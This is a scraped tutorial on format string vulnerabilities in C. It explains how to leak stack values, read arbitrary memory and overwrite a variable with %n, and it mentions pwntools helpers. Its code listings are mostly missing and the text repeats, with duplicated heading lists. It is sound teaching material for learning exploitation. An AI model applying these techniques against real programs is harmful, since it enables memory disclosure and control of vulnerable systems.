1 of 1

Format String Bug

Reading memory off the stack

Format String is a dangerous bug that is easily exploitable. If manipulated correctly, you can leverage it to perform powerful actions such as reading from and writing to arbitrary memory locations.

Why it exists

In C, certain functions can take "format specifier" within strings. Let's look at an example:

This prints out:

So, it replaced %d with the value, %f with the float value and %x with the hex representation.

This is a nice way in C of formatting strings (string concatenation is quite complicated in C). Let's try print out the same value in hex 3 times:

As expected, we get

What happens, however, if we don't have enough arguments for all the format specifiers?

Erm... what happened here?

The key here is that printf expects as many parameters as format string specifiers, and in 32-bit it grabs these parameters from the stack. If there aren't enough parameters on the stack, it'll just grab the next values - essentially leaking values off the stack. And that's what makes it so dangerous.

How to abuse this

Surely if it's a bug in the code, the attacker can't do much, right? Well the real issue is when C code takes user-provided input and prints it out using printf.

If we run this normally, it works at expected:

But what happens if we input format string specifieres, such as %x?

It reads values off the stack and returns them as the developer wasn't expecting so many format string specifiers.

Choosing Offsets

To print the same value 3 times, using

Gets tedious - so, there is a better way in C.

The 1$ between tells printf to use the first parameter. However, this also means that attackers can read values an arbitrary offset from the top of the stack - say we know there is a canary at the 6th %p - instead of sending %p %p %p %p %p %p we can just do %6$p. This allows us to be much more efficient.

Arbitrary Reads

In C, when you want to use a string you use a pointer to the start of the string - this is essentially a value that represents a memory address. So when you use the %s format specifier, it's the pointer that gets passed to it. That means instead of reading a value of the stack, you read the value in the memory address it points at.

Now this is all very interesting - if you can find a value on the stack that happens to correspond to where you want to read, that is. But what if we could specify where we want to read? Well... we can.

Let's look back at the previous program and its output:

You may notice that the last two values contain the hex values of %x . That's because we're reading the buffer. Here it's at the 4th offset - if we can write an address then point %s at it, we can get an arbitrary write!

%p is a pointer; generally, it returns the same as %x just precedes it with a 0x which makes it stand out more

As we can see, we're reading the value we inputted. Let's write a quick pwntools script that write the location of the ELF file and reads it with %s - if all goes well, it should read the first bytes of the file, which is always \x7fELF. Start with the basics:

Nice it works. The base address of the binary is 0x8048000, so let's replace the 0x41424344 with that and read it with %s:

It doesn't work.

The reason it doesn't work is that printf stops at null bytes, and the very first character is a null byte. We have to put the format specifier first.

Let's break down the payload:

We add 4 | because we want the address we write to fill one memory address, not half of one and half another, because that will result in reading the wrong address
The offset is %8$p because the start of the buffer is generally at %6$p. However, memory addresses are 4 bytes long each and we already have 8 bytes, so it's two memory addresses further along at %8$p.

It still stops at the null byte, but that's not important because we get the output; the address is still written to memory, just not printed back.

Now let's replace the p with an s.

Of course, %s will also stop at a null byte as strings in C are terminated with them. We have worked out, however, that the first bytes of an ELF file up to a null byte are \x7fELF\x01\x01\x01.

Arbitrary Writes

Luckily C contains a rarely-used format specifier %n. This specifier takes in a pointer (memory address) and writes there the number of characters written so far. If we can control the input, we can control how many characters are written an also where we write them.

Obviously, there is a small flaw - to write, say, 0x8048000 to a memory address, we would have to write that many characters - and generally buffers aren't quite that big. Luckily there are other format string specifiers for that. I fully recommend you watch to completely understand it, but let's jump into a basic binary.

Simple - we need to overwrite the variable auth with the value 10. Format string vulnerability is obvious, but there's also no buffer overflow due to a secure fgets.

Work out the location of auth

As it's a global variable, it's within the binary itself. We can check the location using readelf to check for symbols.

Location of auth is 0x0804c028.

Writing the Exploit

We're lucky there's no null bytes, so there's no need to change the order.

Buffer is the 7th %p.

And easy peasy:

Pwntools

As you can expect, pwntools has a handy feature for automating %n format string exploits:

The offset in this case is 7 because the 7th %p read the buffer; the location is where you want to write it and the value is what. Note that you can add as many location-value pairs into the dictionary as you want.

You can also grab the location of the auth symbol with pwntools:

Check out the pwntools tutorials for more cool features

Format String Bug

Reading memory off the stack

Format String is a dangerous bug that is easily exploitable. If manipulated correctly, you can leverage it to perform powerful actions such as reading from and writing to arbitrary memory locations.

Why it exists

In C, certain functions can take "format specifier" within strings. Let's look at an example:

int value = 1205;

printf("Decimal: %d\nFloat: %f\nHex: 0x%x", value, (double) value, value);

This prints out:

Decimal: 1205
Float: 1205.000000
Hex: 0x4b5

So, it replaced %d with the value, %f with the float value and %x with the hex representation.

This is a nice way in C of formatting strings (string concatenation is quite complicated in C). Let's try print out the same value in hex 3 times:

As expected, we get

What happens, however, if we don't have enough arguments for all the format specifiers?

Erm... what happened here?

How to abuse this

Surely if it's a bug in the code, the attacker can't do much, right? Well the real issue is when C code takes user-provided input and prints it out using printf.

If we run this normally, it works at expected:

But what happens if we input format string specifieres, such as %x?

It reads values off the stack and returns them as the developer wasn't expecting so many format string specifiers.

Choosing Offsets

To print the same value 3 times, using

Gets tedious - so, there is a better way in C.

Arbitrary Reads

Let's look back at the previous program and its output:

%p is a pointer; generally, it returns the same as %x just precedes it with a 0x which makes it stand out more

Nice it works. The base address of the binary is 0x8048000, so let's replace the 0x41424344 with that and read it with %s:

It doesn't work.

The reason it doesn't work is that printf stops at null bytes, and the very first character is a null byte. We have to put the format specifier first.

Let's break down the payload:

We add 4 | because we want the address we write to fill one memory address, not half of one and half another, because that will result in reading the wrong address
The offset is %8$p because the start of the buffer is generally at %6$p. However, memory addresses are 4 bytes long each and we already have 8 bytes, so it's two memory addresses further along at %8$p.

It still stops at the null byte, but that's not important because we get the output; the address is still written to memory, just not printed back.

Now let's replace the p with an s.

Arbitrary Writes

Simple - we need to overwrite the variable auth with the value 10. Format string vulnerability is obvious, but there's also no buffer overflow due to a secure fgets.

Work out the location of auth

As it's a global variable, it's within the binary itself. We can check the location using readelf to check for symbols.

Location of auth is 0x0804c028.

Writing the Exploit

We're lucky there's no null bytes, so there's no need to change the order.

Buffer is the 7th %p.

And easy peasy:

Pwntools

As you can expect, pwntools has a handy feature for automating %n format string exploits:

You can also grab the location of the auth symbol with pwntools:

Check out the pwntools tutorials for more cool features

Format String Bug

hashtagWhy it exists

hashtagHow to abuse this

hashtagChoosing Offsets

hashtagArbitrary Reads

hashtagArbitrary Writes

hashtagWork out the location of auth

hashtagWriting the Exploit

hashtagPwntools

Format String Bug

hashtagWhy it exists

hashtagHow to abuse this

hashtagChoosing Offsets

hashtagArbitrary Reads

hashtagArbitrary Writes

hashtagWork out the location of auth

hashtagWriting the Exploit

hashtagPwntools

Why it exists

How to abuse this

Choosing Offsets

Arbitrary Reads

Arbitrary Writes

Work out the location of auth

Writing the Exploit

Pwntools

Why it exists

How to abuse this

Choosing Offsets

Arbitrary Reads

Arbitrary Writes

Work out the location of auth

Writing the Exploit

Pwntools